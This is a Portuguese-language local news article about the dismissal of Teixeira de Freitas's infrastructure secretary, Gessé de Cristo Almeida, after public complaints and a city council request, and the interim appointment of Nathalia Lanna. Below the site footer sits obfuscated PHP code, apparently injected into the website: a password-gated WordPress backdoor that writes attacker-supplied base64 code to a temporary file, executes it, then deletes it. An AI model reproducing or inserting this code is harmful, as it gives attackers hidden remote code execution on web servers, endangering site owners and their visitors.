• SEJA BEM-VINDO

Secretário de Infraestrutura Gessé de Cristo é exonerado do cargo e Nathalia Lanna é nomeada interinamente

Publicado em: 19/02/2022 Atualizado:: fevereiro 19, 2022

 

Nesta sexta-feira, 18 de fevereiro, o prefeito municipal de Teixeira de Freitas, Dr. Marcelo Belitardo, exonerou o secretário de Infraestrutura, Gessé de Cristo Almeida. O Decreto 134.2022 foi publicado no Diário Oficial e entra em vigor na data da publicação.

 

O secretário de Infraestrutura deixa o cargo após pouco mais de um ano à frente da Secretaria, uma Pasta importante em qualquer gestão municipal e que vinha promovendo fortes desgastes na atual administração municipal. O jornalista Edvaldo Alves fez valer a voz do povo no Jornal da Liberdade, que vai ao ar na Rádio Eldorado FM, e por várias vezes denunciou o descaso do atual secretário para com a Infraestrutura da cidade.

 

Foram várias as denúncias de empresários do ramo da construção civil e de outras áreas, de moradores em geral. “A cidade está um verdadeiro caos, é o pior secretário de Infraestrutura que a cidade já teve”, disse um denunciante na Rádio Eldorado FM. A insatisfação era geral. Segundo apurou nossa reportagem, até mesmo uma enquete que rolou na cidade, colocou o secretário Gessé de Cristo como o pior secretário do município.

 

A insatisfação foi tamanha que foi preciso o vereador Lucas Bocão fazer um requerimento junto à Câmara Municipal para pedir a exoneração do atual secretário. “Considerando que o Poder Legislativo já tem conhecimento da ineficiência na administração da Secretaria Municipal de Infraestrutura, que vem afetando a população devido aos problemas mais proeminentes no município relacionados a saneamento de água e esgoto, drenagem urbana, más condições viárias (ruas e sinalização de trânsito), coleta e disposição final de lixo”.

 

“Requer à V. Exª, ouvido o soberano Plenário, mediante comunicação ao Prefeito Municipal, que seja exonerado do cargo de Secretário Municipal de Infraestrutura, o senhor Gessé de Cristo Almeida. O Requerimento foi publicado no portal oficial da Câmara Municipal, e foi apreciado na sessão desta terça-feira (15). Por 07 votos a 03, o Requerimento foi aprovado e foi encaminhado ao prefeito municipal para as devidas providências.

 

Em entrevista com o vereador Lucas Bocão, ele disse que não tem nada pessoal contra o secretário, mas se tornou inviável a permanência dele na Pasta. “Não dá mais pra continuar com a falta de fiscalização com as empresas, com os buracos, com os problemas da cidade… Eu tive que tomar essa posição em nome da população. Eu não discuto pessoas, eu tento resolver problemas, e é isso que eu faço como vereador”, disse Lucas Bocão.

 

Segundo apurou a nossa reportagem, no mesmo Diário Oficial, o prefeito Marcelo Belitardo nomeou Nathalia Lanna de Melo, de forma interina para o cargo de Secretária de Infraestrutura. O Liberdade News deseja à nova secretária, uma excelente gestão.

 

Fonte: Liberdadenews


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}